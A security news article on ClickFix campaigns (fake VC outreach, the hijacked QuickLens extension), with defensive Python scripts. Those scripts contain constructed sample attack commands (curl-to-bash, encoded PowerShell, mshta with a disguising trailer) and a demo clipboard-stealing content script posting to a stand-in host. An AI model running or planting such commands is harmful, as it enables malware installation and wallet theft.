
ClickFix threat actors just leveled up their social engineering: they allegedly posed as venture capital firms to lure crypto builders into "fixing" a fake issue, and they also hijacked the QuickLens browser extension in a supply chain move that turns a routine update into a wallet-draining risk. The common thread is trust, first in a brand name, then in a browser extension you already approved. [1]

Moonlock Lab flagged the activity in a Monday report, describing two recent campaigns tied to the "ClickFix" playbook and noting the technique has been tracked since 2024, with broader adoption across industries and a spike in crypto-focused targeting last year. [2]


What ClickFix is really doing (and why it works)

ClickFix is not a single piece of malware; it is a delivery method. The trick is simple and effective: attackers manufacture a moment of urgency, then walk the target through a "fix" that is actually the compromise. [3]

Typical ClickFix flows rely on:

  • A believable pretext: a broken meeting link, a document that "won't render," a KYC step that "failed," or a portfolio file that "needs a quick patch."
  • A guided solution: the victim is instructed to copy and paste a command, run a script, install a "helper," or approve a security prompt.
  • A fast pivot to credential and wallet theft: once code execution or browser access is achieved, the goal becomes session tokens, saved passwords, seed phrases, clipboard data, or direct wallet interactions.
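The "copy and paste this command" step is the one place where the victim can still stop the chain, so it is worth having a way to triage such commands mechanically rather than by gut feel. The script below is an added example, not code from the Moonlock report: it flags the traits that make a pasted "fix" dangerous regardless of who sent it (piping a download into a shell, base64 decoding at run time, hidden or encoded PowerShell, living-off-the-land script hosts, a temp-file drop, elevation, and a benign-looking trailer that hides the real command behind padding). The rules are generic heuristics, and the sample commands are constructed for the demo, not real campaign payloads.

```python
"""Triage copy-paste "fix" commands before anyone runs them.

Added example, not from the Moonlock report. The rules are generic heuristics
for commands that fetch, hide or elevate execution; SAMPLES are constructed
for the demo and are not real campaign payloads."""
import re
from dataclasses import dataclass, field

PIPE_TO_SHELL = "pipes output into a shell or interpreter"
BASE64_DECODE = "decodes base64 at run time"
HIDDEN_POWERSHELL = "hidden, encoded or policy-bypassing PowerShell"
SCRIPT_HOST = "uses a living-off-the-land script host (mshta/osascript/rundll32/regsvr32/certutil)"
TEMP_DROP = "writes a download into a temp directory"
ELEVATION = "asks for elevation (sudo / RunAs)"
BENIGN_TRAILER = "benign-looking trailer or padding that hides the real command"

RULES = [
    (PIPE_TO_SHELL, re.compile(
        r"\|\s*(?:sudo\s+)?(?:bash|sh|zsh|ksh|python3?|perl|iex|invoke-expression)\b", re.I)),
    (BASE64_DECODE, re.compile(r"\bbase64\b\s+(?:-d|--decode)\b|\batob\(|FromBase64String", re.I)),
    (HIDDEN_POWERSHELL, re.compile(
        r"powershell(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand|nop|noprofile|"
        r"ep\s+bypass|executionpolicy\s+bypass|w\s+hidden|windowstyle\s+hidden)\b", re.I)),
    (SCRIPT_HOST, re.compile(r"\b(?:mshta|rundll32|regsvr32|certutil)\b|\bosascript\s+-e\b", re.I)),
    (TEMP_DROP, re.compile(
        r"(?:-o|-O|--output|-OutFile)\s+[\"']?(?:/tmp/|/var/tmp/|\$TMPDIR|%temp%|\$env:temp)", re.I)),
    (ELEVATION, re.compile(r"\bsudo\b|-Verb\s+RunAs\b", re.I)),
    # ClickFix-style lures often pad the real command with whitespace and append a
    # reassuring "verification" comment so only the comment shows in the Run box.
    (BENIGN_TRAILER, re.compile(r"\s{6,}\S|#.*?(?:not a robot|verif|captcha)", re.I)),
]

SAMPLES = [
    # Constructed "fix" instructions of the kind a fake VC or "support" doc might send.
    "curl -fsSL https://deck-viewer.example-vc.invalid/fix.sh | bash",
    'echo "Y3VybCBodHRwczovL2V4YW1wbGUuaW52YWxpZC9mIHwgc2g=" | base64 -d | sh',
    "powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "mshta https://kyc.example.invalid/retry.hta        # ✓ I am not a robot - Verification ID: 7731",
    # Benign commands for comparison.
    "brew install ffmpeg",
    "git clone https://github.com/example/repo.git",
    "npm install",
]


@dataclass
class Verdict:
    command: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def classify(command: str) -> Verdict:
    """Return every rule the command trips; an empty reasons list means nothing fired."""
    verdict = Verdict(command)
    for label, rx in RULES:
        if rx.search(command):
            verdict.reasons.append(label)
    return verdict


def flagged(commands) -> list:
    """Commands that tripped at least one rule, in input order."""
    return [c for c in commands if classify(c).suspicious]


if __name__ == "__main__":
    for v in map(classify, SAMPLES):
        print(f"{'SUSPICIOUS' if v.suspicious else 'ok':10} {v.command[:60]}")
        for r in v.reasons:
            print(f"           - {r}")
```

Run it against the text of any "fix" you are handed; a single hit is enough to stop and verify out of band, because legitimate onboarding steps for a pitch deck or a call do not need any of these traits.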

Crypto is a perfect target because the operational culture rewards speed. People routinely install new tools, connect wallets to unfamiliar sites, and jump on calls with strangers if there is a whiff of funding or deal flow. ClickFix weaponizes that habit.

Moonlock's key point is that this social layer is doing more of the heavy lifting than the malware itself. If the target believes the instructions are coming from someone reputable, the "are you sure" friction disappears.

The VC impersonation angle: targeting builders where they are weakest

According to Moonlock Lab, one of the latest ClickFix campaigns leans on fake venture capital firm identities to approach crypto talent. That matters because VC inbound is a known dopamine hit on Crypto Twitter and in founder DMs, and it creates a power dynamic where targets try to be helpful, responsive, and fast.

The mechanics are not complicated, but the positioning is sharp:

  1. Impersonate a VC or an associate with realistic branding, language, and outreach cadence.
  2. Push the target into a "lightweight step" like opening a deck, joining a call, or reviewing a doc.
  3. Introduce a "quick fix" when something inevitably "breaks," then guide the victim into executing the malicious step.

This is not just phishing for logins. ClickFix campaigns are designed to get you to run something, and once that happens, a wallet is just another high value application on the same machine.

For founders and engineers, the uncomfortable takeaway is that "VC inbound" has become part of the attack surface. If your security model assumes inbound is harmless until a link is clicked, ClickFix is built to bypass that assumption.

QuickLens: the supply chain variant that hits users at scale

The second cluster Moonlock highlighted is the hijacking of the QuickLens browser extension, framed as a supply chain attack. Extension supply chain incidents are uniquely dangerous because users have already granted permissions, often broad ones, and updates can arrive automatically. [4]

Even without exotic exploits, the extension update channel is a distribution superpower:

  • Users do not re-audit permissions after every update.
  • Chrome and browser stores normalize trust by making installation and updates feel routine.
  • Wallet activity happens in the browser, so a compromised extension sits close to high value workflows.

Moonlock's reporting ties ClickFix operators to the QuickLens compromise, indicating attackers are not only social engineering individuals, they are also pursuing scale by taking over trusted software surfaces.

From a risk perspective, that is a meaningful escalation. VC impersonation is a spearphish. An extension hijack is a net.

Why the extension route is so effective for crypto theft

A malicious extension can do damage without "hacking" anything in the Hollywood sense. Depending on permissions and implementation, it can:

  • Inject or modify web pages to swap wallet addresses or alter transaction prompts.
  • Read clipboard data, a common way to redirect transfers when users copy and paste addresses.
  • Harvest browser-stored secrets or session artifacts, depending on the environment.
  • Overlay phishing prompts that mimic wallet connection flows.

The result is the same: users think they are interacting with legitimate UX, while the attacker controls key parts of the funnel.

The market structure of crypto scams: trust, distribution, and time-to-drain

Most crypto theft is not about breaking cryptography. It is about breaking routines.

ClickFix hits three things that repeatedly show up in successful drains:

  1. Borrowed trust
    Impersonating a VC borrows credibility. Hijacking an extension borrows credibility. Both reduce scrutiny.

  2. Distribution leverage
    Social engineering scales through DMs and email lists. Supply chain attacks scale through auto-updates and existing installs.

  3. Compressed decision windows
    "Fix this now," "call starts in five," "deck won't open," "update required." Time pressure kills verification.

If you are looking for a simple mental model, ClickFix is an operator playbook optimized to convert trust into execution, fast.

What users and teams should do right now

Moonlock's reporting is a reminder to treat browser extensions and inbound outreach as production systems, not casual conveniences.

For anyone who installed QuickLens (or any similar extension)

  • Check whether the extension is still installed, then review its permissions and the version currently loaded in your browser's extension settings (chrome://extensions, with Developer mode on to see the ID and version). Auto-update means the version you originally approved may not be the one running now.
  • Disable it first, then investigate. If you need the tool, reinstall only after you have high confidence the listing and publisher are legitimate.
  • Assume compromise if you pasted commands from "support" instructions or a random doc: treat every key the machine has touched as exposed, and move assets to fresh keys generated on a clean device.
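The capabilities listed under "Why the extension route is so effective" map directly onto manifest permissions and a handful of source-level tells, which is what makes the review step above scriptable. The audit below is an added example, not code from the Moonlock report and not QuickLens' own code: it walks the stock Chrome profile locations on macOS, Linux and Windows, flags risky permissions and broad host access in each installed extension's manifest.json, greps its JavaScript for clipboard reads, address-matching regexes, wallet-provider hooks and remote loaders, and reports the version directory's modification time as an approximation of when the last update landed. The permission names and profile paths are real Chrome conventions; the SAMPLE_* inputs are constructed for an offline demo and describe no real extension, and Brave, Edge or Chromium users need to adjust the paths.

```python
"""Audit locally installed Chrome extensions for wallet-draining capabilities.

Added example, not from the Moonlock report and not QuickLens' code. Permission
names and profile paths are stock Chrome conventions; SAMPLE_* objects are
constructed for an offline demo and describe no real extension."""
import json
import os
import re
from datetime import datetime
from pathlib import Path

RISKY_PERMISSIONS = {
    "clipboardRead": "can read copied addresses and seed phrases",
    "clipboardWrite": "can overwrite the clipboard with an attacker address",
    "scripting": "can inject JavaScript into any permitted page",
    "webRequest": "can observe requests, including wallet RPC calls",
    "webRequestBlocking": "can modify or block requests in flight",
    "tabs": "can enumerate open tabs and their URLs",
    "cookies": "can read session cookies for exchange or dashboard logins",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
STORE_UPDATE_HOST = "clients2.google.com"  # Web Store extensions update from here

# Source-level tells of a content script built to swap addresses or exfiltrate.
SOURCE_PATTERNS = [
    ("reads clipboard", re.compile(r"navigator\.clipboard\.readText|execCommand\(\s*['\"]paste")),
    ("matches EVM addresses (address swap candidate)", re.compile(r"0x\[[a-zA-Z0-9-]+\]\{40\}")),
    ("hooks wallet provider", re.compile(r"window\.(?:ethereum|solana)|eth_sendTransaction|eth_sign")),
    ("runs decoded or remote code", re.compile(r"\beval\(|new Function\(|\batob\(|importScripts\(\s*['\"]http")),
    ("talks to a remote endpoint", re.compile(r"fetch\(\s*['\"]https?://|new WebSocket\(")),
]


def audit_manifest(manifest: dict) -> list:
    """Findings from manifest.json alone; handles both MV2 and MV3 layouts."""
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    for p in sorted(perms & RISKY_PERMISSIONS.keys()):
        findings.append(f"permission {p}: {RISKY_PERMISSIONS[p]}")
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}  # MV2 keeps hosts in "permissions"
    for cs in manifest.get("content_scripts", []):
        hosts |= set(cs.get("matches", []))
    if hosts & BROAD_HOSTS:
        findings.append("host access: runs on every site, including wallet and exchange pages")
    update_url = manifest.get("update_url", "")
    if update_url and STORE_UPDATE_HOST not in update_url:
        findings.append(f"non-store update_url: {update_url}")
    return findings


def audit_source(js_text: str) -> list:
    """Source patterns found in one JavaScript file."""
    return [label for label, rx in SOURCE_PATTERNS if rx.search(js_text)]


def audit_extension(version_dir: Path) -> dict:
    """Audit one <id>/<version>/ directory: manifest plus every .js file under it."""
    manifest = json.loads((version_dir / "manifest.json").read_text(encoding="utf-8-sig"))
    findings = audit_manifest(manifest)
    for js in sorted(version_dir.rglob("*.js")):
        for hit in audit_source(js.read_text(encoding="utf-8", errors="ignore")):
            findings.append(f"{js.relative_to(version_dir)}: {hit}")
    # the version directory is created when that version lands, i.e. at the last update
    updated = datetime.fromtimestamp(version_dir.stat().st_mtime).isoformat(timespec="minutes")
    return {"name": manifest.get("name"), "version": manifest.get("version"),
            "updated": updated, "findings": findings}


def chrome_extension_roots() -> list:
    """<profile>/Extensions directories for stock Chrome on macOS, Linux and Windows."""
    home = Path.home()
    bases = [home / "Library" / "Application Support" / "Google" / "Chrome",
             home / ".config" / "google-chrome",
             Path(os.environ.get("LOCALAPPDATA", "")) / "Google" / "Chrome" / "User Data"]
    return [p for b in bases if b.is_dir() for p in b.glob("*/Extensions") if p.is_dir()]


def scan_profiles() -> list:
    """Audit every installed extension version in every local Chrome profile."""
    results = []
    for root in chrome_extension_roots():
        for manifest in sorted(root.glob("*/*/manifest.json")):
            results.append({"id": manifest.parent.parent.name, **audit_extension(manifest.parent)})
    return results


# Constructed demo inputs: what a hijacked "page tool" extension might look like.
SAMPLE_MANIFEST = {"manifest_version": 3, "name": "Page Tools (demo)", "version": "2.4.1",
                   "permissions": ["storage", "clipboardRead", "scripting"],
                   "host_permissions": ["<all_urls>"],
                   "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}]}
SAMPLE_CONTENT_JS = r"""
const EVM = /0x[a-fA-F0-9]{40}/g;                       // address pattern to swap
document.addEventListener("copy", async () => {
  const text = await navigator.clipboard.readText();    // read what the user copied
  fetch("https://collect.example.invalid/c", { method: "POST", body: text });
});
"""
BENIGN_MANIFEST = {"manifest_version": 3, "name": "Dark Theme (demo)", "version": "1.0",
                   "permissions": ["storage"]}

if __name__ == "__main__":
    print("demo manifest:", audit_manifest(SAMPLE_MANIFEST))
    print("demo script:  ", audit_source(SAMPLE_CONTENT_JS))
    for ext in scan_profiles():
        if ext["findings"]:
            print(f"\n{ext['name']} {ext['version']} [{ext['id']}] updated {ext['updated']}")
            for f in ext["findings"]:
                print("  -", f)
```

Hits are prompts for a human look, not proof of compromise: a legitimate wallet extension trips most of these by design, so the useful signal is an extension that had no business with wallets suddenly acquiring these permissions or patterns in a recent version. The mtime check is an approximation; the Web Store listing's version history is the authoritative record of when an update shipped.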

For founders, contributors, and "crypto talent" targeted by VC inbound

  • Verify identity out of band: official domain emails, known partner confirmations, or a separately sourced calendar link. Do not rely on a logo and a warm tone.
  • Never run "fix" commands sent over DM or email. If someone needs you to execute terminal instructions to view a deck, it is already a red flag.
  • Segment wallets: keep day-to-day signing wallets small, keep treasury and long-term bags on colder setups. ClickFix thrives when one hot wallet holds everything.

For teams shipping extensions or browser-based tooling

  • Harden your publisher account security, including MFA and access controls, because hijacking the update channel is the whole game.
  • Minimize permissions and treat any permission expansion as a security event that needs user-facing explanation.
  • Monitor for ownership or metadata changes that could indicate a takeover attempt.

Takeaway: ClickFix is not "back," it is evolving

ClickFix gained traction in crypto circles last year, but Moonlock's timeline puts researchers on it since 2024. The shift now is operational maturity: operators are pairing high-touch impersonation (fake VCs) with high-scale distribution (extension hijacks).

The practical risk is straightforward. If a browser extension you trust can be silently repurposed, and if a "VC" can socially engineer a command execution moment, then your defense cannot be vibes-based. [5]

Signals that the threat has actually receded: verified confirmation that the malicious QuickLens distribution path has been shut down, transparent remediation from the extension's maintainers or the browser store, and no further indicators of compromise tied to the campaign. Until then, treat unexpected "quick fixes," surprise updates, and too-good-to-be-true inbound as live threats, not background noise.